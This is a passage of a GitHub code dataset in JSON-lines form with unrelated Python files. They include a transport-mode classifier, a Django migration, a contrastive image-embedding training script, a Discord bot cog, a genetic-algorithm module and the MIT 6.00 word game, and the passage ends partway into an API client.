results won't overwrite)\n \n model : sklearn-based classifier\n supervised model that will classify\n \"\"\"\n \n\n def __init__(self, op_values, motion_features, \n folder_op, folder_features, \n folder_classification, model, op_features, n_samples):\n \n self.op_values = op_values\n self.motion_features = motion_features\n self.folder_op = folder_op\n self.folder_features = folder_features\n self.model = model\n self.op_features = op_features\n self.n_samples = n_samples\n \n filename = join(folder_classification + \"_\" + str(datetime.now()), \"\")\n self.folder_classification = filename \n \n \n def _get_data(self, transportation, parameter):\n \"\"\" Reads the OP Transformation files and organized them in a\n single dataset: X for features and y for labels.\n \n Parameters\n ----------\n transportation : list of str\n list of transportation mode name used to classification\n \n parameter : list of int\n list of OP parameters: D and tau\n \n Returns\n -------\n X : pandas dataframe\n dataframe of features \n \n y : pandas dataframe\n class labels\n \"\"\"\n \n D, tau = parameter\n op_values = \"_D\" + str(D) + \"_t\" + str(tau) + \".csv\"\n features_name = [m + op_values for m in self.motion_features]\n # ex: 'distance_D3_t1.csv'\n\n X = pd.DataFrame()\n y = pd.DataFrame() \n \n print(\"### OP features: {}\".format(self.op_features))\n \n for transport in transportation:\n \n # path to op transformation files\n # ex: query = 'op_bus_distance_D3_t1.csv'\n # ex: op_files = 'db/GeoLife/op_features/op_bus_distance_D3_t1.csv'\n file_name = \"op_\" + transport + \"_\"\n query = [file_name + f for f in features_name] \n op_files = [self.folder_op + q for q in query]\n \n df_transport_op = pd.DataFrame() \n \n for file in op_files: \n op_csv = pd.read_csv(file, usecols = self.op_features)\n op_csv = op_csv[self.op_features] # to assure order\n \n # axis = 1 is by column, axis = 0 is by rows\n concat = [df_transport_op, op_csv]\n df_transport_op = pd.concat(concat, axis = 1, ignore_index = True)\n df_transport_op = df_transport_op.dropna()\n \n \n \n ### motion_features\n motion = MotionDataset()\n \n file_name = transport + \"*\" + \".csv\"\n path_transport = get_files(self.folder_features, file_name, True)\n \n feature_df = motion.build_dataset(self.motion_features, path_transport)\n \n concat2 = [df_transport_op, feature_df]\n df_transport_op = pd.concat(concat2, axis = 1, ignore_index = True) \n \n \n df_transport_op = df_transport_op[:self.n_samples] \n \n # features\n concat1 = [X, df_transport_op]\n X = pd.concat(concat1, axis = 0, ignore_index = True)\n \n # labels\n op_class = pd.DataFrame([transport] * len(df_transport_op))\n concat2 = [y, op_class]\n y = pd.concat(concat2, axis = 0, ignore_index = True) \n\n \n n = len(X.columns)\n \n print(\"#### OP features size: {}\".format(n))\n print(\"size\", len(X), len(y))\n \n return X, y\n \n\n def _build_dataset(self, parameter, transports):\n \"\"\" Only for GeoLife dataset. Get the transportation mode set to classify\n based on previous works (helps comparing the results)\n \n Parameters\n ----------\n parameter : list of int\n list of OP parameters: D and tau\n \n Returns\n -------\n X : pandas dataframe\n dataframe of features\n length: Information Theory features * motion features * parameter\n \n y : pandas dataframe\n class labels \n \"\"\"\n\n \n# transports = [\"bus\", \"car\", \"taxi\", \"walk\", \"bike\"]\n \n X, y = self._get_data(transports, parameter)\n \n if \"car\" in transports or \"taxi\" in transports:\n y = y.replace(to_replace = \"car\", value = \"driving\")\n y = y.replace(to_replace = \"taxi\", value = \"driving\")\n \n \n print(\"TRANSPORTATION MODE: \", transports)\n \n# self._save_dataset(X, y, parameter)\n \n return X, y \n \n \n def _colnames(self, features):\n \n colnames = list(product(self.motion_features, features))\n colnames = list(map('_'.join, colnames))\n \n return colnames\n \n \n def _save_dataset(self, X, y, parameter):\n \"\"\" It saves the dataset that will be used to classify \n (helpful for plotting).\n \n Parameters\n ----------\n X : pandas dataframe\n dataframe of features \n \n y : pandas dataframe\n class labels\n \"\"\"\n \n # Save dataset\n create_folder(self.folder_classification)\n \n ## get feature name \n colnames_op = self._colnames(self.op_features)\n \n colnames = [\"classes\"] + colnames_op\n name = \"_op_\" + str(parameter) + \".csv\"\n \n data = pd.concat([y, X], axis = 1, ignore_index = True)\n data.columns = colnames\n filename = self.folder_classification + \"DATASET_\" + name\n \n data.to_csv(filename, index = False) \n \n\n def _save_results(self, df, file_name):\n \"\"\" It saves the classification results (metrics and confusion matrices)\n in the self.folder_classification (it will create the folder, if it doesn't exist).\n \n Parameters\n ----------\n df : pandas dataframe\n the results to save\n \n file_name : str\n the name to save the result\n \n Returns\n -------\n no value\n \"\"\"\n \n create_folder(self.folder_classification)\n \n path_to_save = join(self.folder_classification, file_name)\n \n try:\n df.to_csv(path_to_save, sep = \",\")\n \n except: # for confusion matrices\n \n df = np.array(df)\n with open(path_to_save, 'w') as outfile:\n for enum, data_slice in enumerate(df):\n \n if enum != 10:\n # Writing out a break to indicate different slices...\n outfile.write('# Confusion Matrix for CV{}\\n'.format(enum+1))\n else:\n outfile.write('# Total Confusion Matrix\\n')\n\n np.savetxt(outfile, data_slice, fmt='%d')\n \n \n \n \n def classification(self, n_folds, transports):\n \"\"\" It calls the classification pipeline: join the dataset and classify it.\n Also, it saves the classification results in the chosen folder.\n \n Parameters\n ----------\n n_folds : int\n how many folds to divide data to cross-validation\n \n Returns\n -------\n no value\n \"\"\"\n\n \n print(\"--- Saving at {}\".format(self.folder_classification)) \n\n for parameter in self.op_values:\n\n print(\"OP PARAMETERS: {}\".format(str(parameter)))\n print(\"FEATURES: {}\".format(str(self.motion_features)))\n \n X, y = self._build_dataset(parameter, transports)\n \n clf = Classification()\n standardize = True\n df, cm = clf.classification(X, y, self.model, standardize, n_folds)\n \n # save data\n filename = \"METRICS_\" + str(parameter) + \".csv\"\n self._save_results(df, filename)\n\n filename = \"ConfusionMatrices_\" + str(parameter) + \".txt\"\n self._save_results(cm, filename)\n \n print(\"\\n-------------------------------------------------\")\n print(\"-------------------------------------------------\\n\")\n","repo_name":"icps/tmc_ordinal_patterns","sub_path":"src/classification/op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22392733432","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('movies', '0011_auto_20150607_1101'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Poster',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('source_url', models.URLField(null=True)),\n ('source_updated', models.DateTimeField(null=True)),\n ('image', models.ImageField(null=True, upload_to='', height_field='height', width_field='field')),\n ('image_updated', models.DateTimeField(null=True)),\n ('width', models.PositiveIntegerField(null=True)),\n ('height', models.PositiveIntegerField(null=True)),\n ],\n ),\n migrations.AddField(\n model_name='movie',\n name='poster',\n field=models.OneToOneField(to='movies.Poster', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"despawnerer/thinkies","sub_path":"movies/migrations/0012_auto_20150607_1103.py","file_name":"0012_auto_20150607_1103.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19972193498","text":"whisky_price = float(input())\nbeer_amount = float(input())\nwine_amount = float(input())\nrakia_amount = float(input())\nwhisky_amount = float(input())\n\nrakia_price = whisky_price / 2\nwine_price = rakia_price - 0.4*rakia_price\nbeer_price = rakia_price - 0.8*rakia_price\n\nwhisky_sum = whisky_amount*whisky_price\nbeer_sum = beer_price * beer_amount\nwine_sum = wine_price * wine_amount\nrakia_sum = rakia_price * rakia_amount\n\n\ntotal_sum = whisky_sum + beer_sum + wine_sum + rakia_sum\nprint(f' {total_sum: .2f} ')\n\n","repo_name":"svgeesus/svgeesus.github.io","sub_path":"Exercises/Alchocol_Market.py","file_name":"Alchocol_Market.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"21536893873","text":"import board\nimport digitalio\nfrom adafruit_debouncer import Debouncer\n\npin = digitalio.DigitalInOut(board.D10)\npin.direction = digitalio.Direction.INPUT\npin.pull = digitalio.Pull.DOWN\nswitch = Debouncer(pin)\n\nwhile True:\n switch.update()\n if switch.fell:\n print(\"Just released\")\n if switch.rose:\n print(\"Just pressed\")","repo_name":"MichaelStickels/Macro_Pad_2.0","sub_path":"Firmware/Button_Test.py","file_name":"Button_Test.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24006459050","text":"import logging\nimport random\n\nimport numpy as np\n\n\ndef crossover(ind1, ind2, uniform=0.5):\n # log = logging.getLogger('crossover')\n child = ind1.copy()\n\n rand = np.random.random(size=child.gen.size)\n child.gen = np.where(rand > uniform, child.gen, ind2.gen)\n\n return child\n\n\ndef tournament(pop, size):\n # log = logging.getLogger('tournament')\n\n assert size * 2 < len(\n pop.ind\n ), f\"Tournament size ({size}) has to be lower than population ({len(pop.ind)}) // 2\"\n\n # Form groups\n g1g2 = np.random.choice(pop.ind, size=size * 2, replace=False)\n group1 = g1g2[:size]\n group2 = g1g2[size:]\n\n # Pick and return fittest from each group\n fit1 = np.argmin([x.val for x in group1])\n fit2 = np.argmin([x.val for x in group2])\n\n i1 = group1[fit1]\n i2 = group2[fit2]\n\n # log.debug(\"{}, {}\".format(i1.id, i2.id))\n\n return i1, i2\n\n\ndef mutation(ind, rate, scale):\n \"\"\"\n Mutate genes. `rate` controls how many genes are mutated.\n\n :param ind: Individual\n :param rate: float (0-1), mutation rate\n :param scale: standard deviation of the normal distribution\n :return: mutated Individual (copy)\n \"\"\"\n # log = logging.getLogger('mutation')\n\n # Draw random value to be compared with rate\n mut = np.random.rand(ind.gen.size)\n\n # Draw new random genes from a normal distribution\n mut_gen = np.random.normal(loc=ind.gen, scale=scale)\n # To 0-1 range\n mut_gen = np.where(mut_gen > 1.0, 1.0, mut_gen)\n mut_gen = np.where(mut_gen < 0.0, 0.0, mut_gen)\n # Substitute genes where mut < rate\n new_gen = np.where(mut < rate, mut_gen, ind.gen)\n\n # log.debug(f\"Old genes: {ind.gen}\")\n # log.debug(f\"Candidate genes {mut_gen}\")\n # log.debug(f\"New genes {new_gen}\")\n\n mutind = ind.copy()\n mutind.set_genes(new_gen)\n\n return mutind\n","repo_name":"krzysztofarendt/modestga","sub_path":"modestga/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"73610996568","text":"import subprocess\nimport sys\n\ndef install(package):\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"-i\",\n \"https://pypi.tuna.tsinghua.edu.cn/simple\", \"-U\", package])\n\ninstall(\"imgaug\")\n\nimport os\nimport cv2\nimport time\nimport random\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.utils as vutils\nimport torchvision.models as models\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tqdm import trange\nfrom scipy.spatial import distance\nfrom collections import OrderedDict\nfrom imgaug import augmenters as iaa\nfrom IPython.display import clear_output\n\nfrom lib.utils_torch import Identity\nfrom lib.utils import normalize, read_all_imgs, extractor\n\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\n_root = \"./imagenet/ILSVRC/Data/CLS-LOC/train\"\nmodel_path = \"./models/final_res50_model_training_with_ImageNet.pth\"\n\nclass Net(nn.Module):\n\n def __init__(self, path_pre=None, gpus=[]):\n super(Net, self).__init__()\n self.pre = models.resnet50(pretrained=False)\n\n if path_pre is not None:\n self.pre.load_state_dict(torch.load(path_pre))\n\n self.pre.fc = nn.Linear(2048, 768)\n self.act = nn.Tanh()\n\n if len(gpus) > 1:\n self.pre = nn.DataParallel(self.pre, gpus)\n\n def forward(self, x):\n h = self.pre(x)\n h = self.act(h)\n return h\n\nclass Loss(nn.Module):\n\n def __init__(self, device=torch.device(\"cpu\")):\n super(Loss, self).__init__()\n self.ce = nn.CrossEntropyLoss()\n\n self.device = device\n self.to(device)\n\n def forward(self, x, mode, optimizer=None, scheduler=None):\n \"\"\"\n x: (k/j (classes), m/i (samples), c (n_features))\n \"\"\"\n centers = torch.mean(x, 1, keepdim=False)\n sims = -torch.cdist(x.reshape([-1, x.size(-1)]), centers, p=2)\n# sims = torch.max(sims, torch.tensor(-5.0).to(self.device))\n\n if mode==\"softmax\":\n labels = torch.tensor(list(np.arange(x.size(0)).repeat(x.size(1)))).to(self.device)\n loss = self.ce(sims, labels)\n\n elif mode==\"contrast\":\n indices = list(np.arange(sims.size(0)))\n labels = list(np.arange(x.size(0)).repeat(x.size(1)))\n sims_clone = torch.clone(sims)\n sims_clone[indices, labels] = -1e32\n loss_self = sims[indices, labels]\n loss_others = torch.max(sims_clone, dim=1).values\n # loss = 1-torch.sigmoid(loss_self)+torch.sigmoid(loss_others)\n loss = loss_others-loss_self\n loss = torch.mean(loss)\n\n else:\n raise ValueError(\"Invalid mode.\")\n\n if optimizer is not None:\n # back propagation and update centers\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n\n return loss\n\nroots = sorted([x for x in os.listdir(_root) if x[0]!='.'])\n\npaths = []\npath_labels = []\nfor i in trange(len(roots)):\n root = os.path.join(_root, roots[i])\n paths_ = read_all_imgs(root, _iter=False)\n paths = paths+paths_\n path_labels = path_labels+[i,]*len(paths_)\n\npaths = [x for x in zip(paths, path_labels)]\nprint(len(paths))\n\nlr = 2e-4\ngpus = [0,1,2,3]\nn_pics = 16*len(gpus)\nn_samples = 16 # min=4\n\nif len(gpus)>0:\n device = torch.device(\"cuda:\"+str(gpus[0]))\nelse:\n device = torch.device(\"cpu\")\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\netr = extractor()\n\nmy_model = Net().to(device)\nmy_model = nn.DataParallel(my_model, gpus)\n\n# my_model.load_state_dict(torch.load(model_path))\n\noptimizer = optim.Adam(my_model.parameters(), lr)\ncriterion = Loss(device)\n\nbest_loss = 1e8\ni_epoch = -1\nloss_log = []\n\naug_seq_all = iaa.Sequential([\n iaa.Affine(rotate=(-35, 35)),\n iaa.Crop(percent=(0, 0.1)),\n iaa.GaussianBlur(sigma=(0.0, 3.0)),\n iaa.AddToHue((-20, 20)),\n iaa.AddToSaturation((-150, 50)),\n iaa.MultiplyAndAddToBrightness(mul=(0.75, 1.3), add=(-40, 40)),\n iaa.GammaContrast((0.75, 1.3)),\n iaa.GammaContrast((0.75, 1.3), per_channel=True),\n# iaa.ChangeColorTemperature((3000, 9000)),\n iaa.AdditiveGaussianNoise(scale=(0, 0.1*255)),\n iaa.JpegCompression(compression=(0, 99)),\n iaa.MotionBlur(k=(3,15)),\n iaa.CoarseDropout(0.02, size_percent=0.1, per_channel=0.5),\n])\n\nstart_time = time.time()\n\nwhile True:\n i_epoch+=1\n _indices = np.random.choice(len(paths), len(paths), replace=False)\n n_round = int(len(paths)/n_pics)\n for i_round in range(n_round):\n _augs = []\n indices = _indices[i_round * n_pics : (i_round+1) * n_pics]\n for index in indices:\n img = cv2.imread(paths[index][0])[...,::-1]\n augs = etr.extract(img, n_augs=n_samples, target_size=224, aug_seq=aug_seq_all, resolution_aug=\"False\")\n augs = normalize(augs.transpose([0,3,1,2]), mean=mean, std=std)\n _augs.append(augs)\n _augs = np.concatenate(_augs, axis=0)\n Xs = torch.from_numpy(_augs.astype(np.float32)).to(device)\n hs = my_model(Xs)\n hs = torch.reshape(hs, [n_pics, n_samples, -1])\n\n loss = criterion(hs, mode=\"contrast\", optimizer=optimizer)\n loss_log.append(loss.item())\n time_cost = (time.time()-start_time)/3600\n\n print('[Epoch %d][%d/%d]\\tLoss: %.4f\\tTime: %.4f hrs'\n % (i_epoch+1, i_round+1, n_round, loss.item(), time_cost))\n\n if (len(loss_log)+1)%20==0:\n curr_loss = np.mean(loss_log[-20:])\n print(\"------------------------\")\n print(\"curr_loss\", curr_loss, \"best_loss\", best_loss)\n print(model_path)\n if curr_loss bool:\n words = s.split()\n \n if len(pattern) != len(words):\n return False\n \n word2patDict = {}\n pat2wordDict = {}\n for pat, word in zip(pattern, words):\n if pat not in pat2wordDict and word not in word2patDict:\n pat2wordDict[pat] = word\n word2patDict[word] = pat\n elif pat not in pat2wordDict or word not in word2patDict:\n return False\n else:\n if pat2wordDict[pat] != word or word2patDict[word] != pat:\n return False\n \n return True\n ","repo_name":"has64pitt/leetcode4fun","sub_path":"solutions/0250-0299/0290_Word_Pattern/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37542501471","text":"import discord, logging\nfrom discord.ext import commands\nfrom util.functions import randomDiscordColor # pylint: disable=no-name-in-module\nfrom models import BotConfig\nfrom util.publicCommands import publicCommand # pylint: disable=no-name-in-module\nfrom mongoengine import DoesNotExist\n\nclass Miscellaneous(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @publicCommand\n @commands.command()\n async def say(self, ctx: commands.Context, *, content: str):\n \"\"\"\n Have the bot will respond with whatever argmeument you give it\n \"\"\"\n await ctx.send(content)\n \n @publicCommand \n @commands.command()\n async def react(self, ctx: commands.Context, messageId, emoji: str):\n message = await ctx.channel.fetch_message(messageId)\n await message.add_reaction(emoji)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n print('guild id')\n print(member.guild.id)\n config = BotConfig.BotConfig.getForGuild(member.guild.id)\n channel = member.guild.get_channel(config.welcomeChannel)\n await channel.send(f'Welcome to {member.guild.name}, {member.mention}!')\n try:\n memberRole = member.guild.get_role(config.memberRoleId)\n except DoesNotExist:\n # Just me being lazy... That is the id of member role in tit\n memberRole = member.guild.get_role(607396881546477661)\n\n member.add_roles(memberRole)\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n config = BotConfig.BotConfig.getForGuild(member.guild.id)\n channel = member.guild.get_channel(config.welcomeChannel)\n await channel.send(f'{member.name} just left :(')\n \n\ndef setup(bot: commands.Bot):\n bot.add_cog(Miscellaneous(bot))","repo_name":"teens-in-tech/DiscordBot","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69962296089","text":"# Problem Set 5: 6.00 Word Game\n# Name: \n# Collaborators: \n# Time: \n#\n\nimport random\nimport string\nimport time\nimport json\nimport itertools\n\n\nVOWELS = 'aeiou'\nCONSONANTS = 'bcdfghjklmnpqrstvwxyz'\nHAND_SIZE = 7\npoints_dict = {}\nrearrange_dict = {}\n\n\nSCRABBLE_LETTER_VALUES = {\n 'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10\n}\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r', encoding='ascii')\n # wordlist: list of strings\n wordlist = []\n for line in inFile:\n wordlist.append(line.strip().lower())\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef get_frequency_dict(sequence):\n \"\"\"\n Returns a dictionary where the keys are elements of the sequence\n and the values are integer counts, for the number of times that\n an element is repeated in the sequence.\n\n sequence: string or list\n return: dictionary\n \"\"\"\n # freqs: dictionary (element_type -> int)\n freq = {}\n for x in sequence:\n freq[x] = freq.get(x,0) + 1\n return freq\n\n\n# (end of helper code)\n# -----------------------------------\n\n#\n# Problem #1: Scoring a word\n#\ndef get_word_score(word, n):\n \"\"\"\n Returns the score for a word. Assumes the word is a\n valid word.\n\n The score for a word is the sum of the points for letters\n in the word, plus 50 points if all n letters are used on\n the first go.\n\n Letters are scored as in Scrabble; A is worth 1, B is\n worth 3, C is worth 3, D is worth 2, E is worth 1, and so on.\n\n word: string (lowercase letters)\n returns: int >= 0\n \"\"\"\n score = 0\n\n for i in word:\n score = score + SCRABBLE_LETTER_VALUES.get(i)\n\n if len(word) == n:\n score = score + 50\n\n return score\n#\n# Make sure you understand how this function works and what it does!\n#\ndef display_hand(hand):\n \"\"\"\n Displays the letters currently in the hand.\n\n For example:\n display_hand({'a':1, 'x':2, 'l':3, 'e':1})\n Should print() out something like:\n a x x l l l e\n The order of the letters is unimportant.\n\n hand: dictionary (string -> int)\n \"\"\"\n for letter in hand.keys():\n for j in range(hand[letter]):\n print( letter, end=' ' ) # print() all on the same line\n print() # print() an empty line\n\n#\n# Make sure you understand how this function works and what it does!\n#\ndef deal_hand(n):\n \"\"\"\n Returns a random hand containing n lowercase letters.\n At least n/3 the letters in the hand should be VOWELS.\n\n Hands are represented as dictionaries. The keys are\n letters and the values are the number of times the\n particular letter is repeated in that hand.\n\n n: int >= 0\n returns: dictionary (string -> int)\n \"\"\"\n hand={}\n num_vowels = int(n / 3) #******* I CHANGED THIS FOR PYTHON3 *****\n \n for i in range(num_vowels):\n x = VOWELS[random.randrange(0,len(VOWELS))]\n hand[x] = hand.get(x, 0) + 1\n \n for i in range(num_vowels, n): \n x = CONSONANTS[random.randrange(0,len(CONSONANTS))]\n hand[x] = hand.get(x, 0) + 1\n \n return hand\n\n#\n# Problem #2: Update a hand by removing letters\n#\ndef update_hand(hand, word):\n \"\"\"\n Assumes that 'hand' has all the letters in word.\n In other words, this assumes that however many times\n a letter appears in 'word', 'hand' has at least as\n many of that letter in it. \n\n Updates the hand: uses up the letters in the given word\n and returns the new hand, without those letters in it.\n\n Has no side effects: does not mutate hand.\n\n word: string\n hand: dictionary (string -> int) \n returns: dictionary (string -> int)\n \"\"\"\n \n for letter in word:\n hand[letter] = hand.get(letter,0) - 1\n return hand\n\n# PS05 Implementation of is_valid_word (unused)\ndef is_valid_word(word, hand, word_list):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. Otherwise, returns False.\n Does not mutate hand or word_list.\n \n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n hand2 = hand.copy()\n\n for letter in word:\n if hand2.get(letter, 0) == 0: #if letter is not in hand (or letter has run out)\n return False\n hand2[letter] = hand2.get(letter,0) -1 #decrement letter in hand\n\n if word in word_list:\n return True\n else: \n return False\n\n# PS06 Implementation of is_valid_word\ndef is_valid_word_points(word, hand, points_dict):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. Otherwise, returns False.\n Does not mutate hand or word_list.\n \n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n hand2 = hand.copy()\n\n for letter in word:\n if hand2.get(letter, 0) == 0: #if letter is not in hand (or letter has run out)\n return False\n hand2[letter] = hand2.get(letter,0) -1 #decrement letter in hand\n\n if word in points_dict:\n return True\n else: \n return False\n\ndef pick_best_word(hand, points_dict):\n\n \"\"\" Return the highest scoring word from points_dict that can be made with thegiven hand.\n Return '.' if no words can be made with the given hand.\n \"\"\"\n current_max = 0\n current_word = \".\"\n\n for word in word_list:\n if is_valid_word_points(word, hand, points_dict) and points_dict[word]>current_max:\n current_max = points_dict[word]\n current_word = word\n return current_word\n\ndef pick_best_word_faster(hand, rearrange_dict):\n hand_subsets = get_hand_subsets(hand)\n current_max = 0\n current_word = '.'\n for subset in hand_subsets:\n if subset in rearrange_dict:\n temp_word = rearrange_dict[subset] #unscramble sorted word\n if points_dict[temp_word] > current_max:\n current_max = points_dict[temp_word]\n current_word = temp_word\n return current_word\n\ndef get_hand_subsets(hand):\n \"\"\"\n hand_subsets is subsets of the letters of hand.\n \"\"\"\n letters = [c for c in hand for i in range(hand[c])]\n hand_subsets = ()\n for i in reversed(range(1, len(letters)+1)):\n for tup in set(itertools.combinations(letters, i)):\n hand_subsets += (''.join(sorted(tup)), )\n return hand_subsets\n\ndef get_words_to_points(word_list):\n \"\"\" Return a dict that maps every word in word_list to its point value.\n \"\"\"\n for word in word_list:\n score = get_word_score(word, len(word))\n points_dict[word] = score\n\n # WRITE THE POINTS_DICT TO JSON\n # with open('scores.txt', 'w') as file:\n # file.write(json.dumps(points_dict))\n\n return points_dict\n\ndef get_word_rearrangements(word_list):\n for word in word_list:\n sorted_word = ''.join(sorted(word))\n rearrange_dict[sorted_word] = word\n return\n\ndef get_time_limit(points_dict, k):\n \"\"\"\n Return the time limit for the computer player as a function of the\n multiplier k.\n points_dict should be the same dictionary that is created by\n get_words_to_points.\n \"\"\"\n start_time = time.time()\n # Do some computation. The only purpose of the computation is so we can\n # figure out how long your computer takes to perform a known task.\n for word in points_dict:\n get_frequency_dict(word)\n get_word_score(word, HAND_SIZE)\n end_time = time.time()\n return (end_time - start_time) * k\n\n\n# word_list = load_words()\n# print(is_valid_word('honey', {'n': 0, 'h': 1, 'o': 1, 'y': 1, 'd': 1, 'w': 1, 'e': 2}, word_list))\n\n#\n# Problem #4: Playing a hand\n#\ndef play_hand(hand, word_list, points_dict):\n \"\"\"\n Allows the user to play the given hand, as follows:\n\n * The hand is displayed.\n \n * The user may input a word.\n\n * An invalid word is rejected, and a message is displayed asking\n the user to choose another word.\n\n * When a valid word is entered, it uses up letters from the hand.\n\n * After every valid word: the score for that word and the total\n score so far are displayed, the remaining letters in the hand \n are displayed, and the user is asked to input another word.\n\n * The sum of the word scores is displayed when the hand finishes.\n\n * The hand finishes when there are no more unused letters.\n The user can also finish playing the hand by inputing a single\n period (the string '.') instead of a word.\n\n * The final score is displayed.\n\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n score = 0\n elapsed_time = 0;\n print()\n # while True:\n # try:\n # time_limit = float(input(\"Enter time limit, in seconds, for players: \"))\n # break\n # except ValueError:\n # print(\"Please enter a valid number...\")\n\n time_limit = TIME_LIMIT \n \n while(True):\n\n if sum(hand.values())==0:\n break;\n\n print()\n print('Current Hand')\n display_hand(hand)\n # print(sum(hand.values()))\n \n start_time = time.time()\n # guess = input(\"Enter word, or a . to indicate that you are finished: \")\n # guess = pick_best_word(hand, points_dict)\n guess = pick_best_word_faster(hand, rearrange_dict)\n end_time = time.time()\n\n\n word_time = end_time - start_time\n if word_time<.1:\n word_time = .1;\n\n elapsed_time = elapsed_time + word_time\n\n\n print('It took %0.2f seconds to provide an answer.' % word_time)\n\n if elapsed_time>time_limit:\n print('\\nTotal time exceeds {0:0.0f} seconds. You scored {1:0.2f} points.'.format(time_limit, score))\n return 0\n\n if guess == '.':\n print()\n break\n \n # if (is_valid_word(guess, hand, word_list)==False):\n # print()\n # print(\"Invalid guess. Try again:\")\n # print()\n\n else: \n hand = update_hand(hand, guess)\n points = get_word_score(guess, HAND_SIZE) / word_time\n score = score + points\n print(str(guess).upper()+' earned %0.2f points' % points)\n print('Total Score: %0.2f' % score) \n print()\n \n print('********************')\n print('TOTAL SCORE: '+str(score))\n print('********************')\n return 0 \n\n#\n# Problem #5: Playing a game\n# Make sure you understand how this code works!\n# \ndef play_game(word_list):\n \"\"\"k\n Allow the user to play an arbitrary number of hands.\n\n * Asks the user to input 'n' or 'r' or 'e'.\n\n * If the user inputs 'n', let the user play a new (random) hand.\n When done playing the hand, ask the 'n' or 'e' question again.\n\n * If the user inputs 'r', let the user play the last hand again.\n\n * If the user inputs 'e', exit the game.\n\n * If the user inputs anything else, ask them again.\n \"\"\"\n # TO DO ...\n # print(\"play_game not implemented.\") # delete this once you've completed Problem #4\n # play_hand(deal_hand(HAND_SIZE), word_list) # delete this once you've completed Problem #4\n # play_hand({'n': 1, 'h': 1, 'o': 1, 'y': 1, 'd':1, 'w':1, 'e': 2}, word_list)\n ## uncomment the following block of code once you've completed Problem #4\n \n hand = deal_hand(HAND_SIZE) # random init\n while True:\n cmd = input('Enter n to deal a new hand, r to replay the last hand, or e to end game: ')\n if cmd == 'n':\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list, points_dict)\n print()\n elif cmd == 'r':\n play_hand(hand.copy(), word_list, points_dict)\n print()\n elif cmd == 'e':\n break\n else:\n print(\"Invalid command.\") \n\n#\n# Build data structures used for entire session and play game\n#\nif __name__ == '__main__':\n word_list = load_words()\n get_words_to_points(word_list)\n get_word_rearrangements(word_list)\n TIME_LIMIT = get_time_limit(points_dict,5)\n play_game(word_list)\n # print('TIME LIMIT: ', TIME_LIMIT)\n\n\n# PS06 Problem #5\n# It seems that...\n# pick_best_word will be O(n) where n is the number of words in the word list\n# pick_best_word_faster will be O(1) since our hand size is fixed\n# ...thus our number of hand multisets will remain constant as well\n# ...leaving us just about the same number of operations each time\n# ...some minimal variation depending on length of our words if we pick more than one\n\n\n","repo_name":"daytonpe/mit-6.00","sub_path":"ps06/ps6.py","file_name":"ps6.py","file_ext":"py","file_size_in_byte":13137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5743274408","text":"import requests\nimport json\nimport os\n\n\nclass indixException(Exception):\n pass\n\nclass indixRestException(indixException):\n \"\"\" This should do something with error codes from indix. Maybe.\n\n :param int status: the error code\n :param str uri: the url\n :param str msg: the message, if one exists\n \"\"\"\n def __init__(self, status, uri, msg=\"\"):\n self.uri=uri\n self.status=status\n self.msg=msg\n\n def 